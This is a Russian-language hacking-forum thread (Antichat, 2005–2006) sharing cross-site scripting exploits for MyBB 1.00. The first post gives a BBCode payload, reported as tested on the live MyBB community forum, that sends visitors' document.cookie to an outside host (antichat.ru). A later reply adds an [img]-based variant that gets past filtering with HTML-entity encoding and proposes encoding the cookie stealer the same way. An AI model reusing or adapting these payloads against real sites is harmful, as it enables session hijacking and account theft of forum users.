ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу XSS в MyBB (MyBulletinBoard 1.00)
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS в MyBB (MyBulletinBoard 1.00)
  #1  
Старый 14.01.2005, 18:44
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию XSS в MyBB (MyBulletinBoard 1.00)
Эксплоит
Код HTML:
[url=" style=`background:url(javaS	cript:i=new Image()\;i.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie)`]ssssssss[/url]
javascript через табуляцию

Проверялось в форуме
http://mybboard.com/community/
Последний раз редактировалось Algol; 14.01.2005 в 18:48..
 
Ответить с цитированием

  #2  
Старый 05.01.2006, 14:14
Аватар для néM3S!s
néM3S!s
Познающий
Регистрация: 07.09.2005
Сообщений: 31
Провел на форуме:
63022

Репутация: 26
По умолчанию
Excellent !

ThX Algol
 
Ответить с цитированием

  #3  
Старый 05.01.2006, 21:48
Аватар для Romaxa55
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
Провел на форуме:
584821

Репутация: 83
Отправить сообщение для Romaxa55 с помощью ICQ
По умолчанию
Спасибо, но мне кажется я гдето это видел... а не на секьюри?
 
Ответить с цитированием

  #4  
Старый 06.01.2006, 01:48
Аватар для Ricky
Ricky
Banned
Регистрация: 04.01.2006
Сообщений: 10
Провел на форуме:
24702

Репутация: 2
По умолчанию
Цитата:
Сообщение от Algol  
Эксплоит
Код HTML:
[url=" style=`background:url(javaS	cript:i=new Image()\;i.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie)`]ssssssss[/url]
javascript через табуляцию

Проверялось в форуме
http://mybboard.com/community/
А зачем тебе обратный слеш \; ?

Кстати если написать вот так,

Код HTML:
[img]http://www.wj"'='.gif[/img]'style=background:url('javascript:alert(/wj/)');
То будет работать во всех трех браузерах, Опера, Фаерфокс и ИЕ. Но так как Фаерфокс имеет автоматическую защиту, то алерт выскочит только в ИЕ и Опере.

Строку,

Цитата:
background:url('javascript:alert(/wj/)');
Нужно закодировать Юникодом UTF-8 используя эту ссылку.

http://ha.ckers.org/xss.html

Там где говориться
Цитата:
Decimal Value:
Так как произойдет фильтрация.

Будет это все выглядеть типа вот так,

Код HTML:
[img]http://www.wj"'='.gif[/img]'style=&#98&#97&#99&#107&#103&#114&#111&#117&#110&#100&#58&#117&#114&#108&#40&#39&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#47&#119&#106&#47&#41&#39&#41&#59
Только после каждого символа, теперь надо поставить точку с запятой. (;)

Код для воровки кук, можно взять от Алгола и так же его закодировать.
Последний раз редактировалось Ricky; 06.01.2006 в 02:28..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ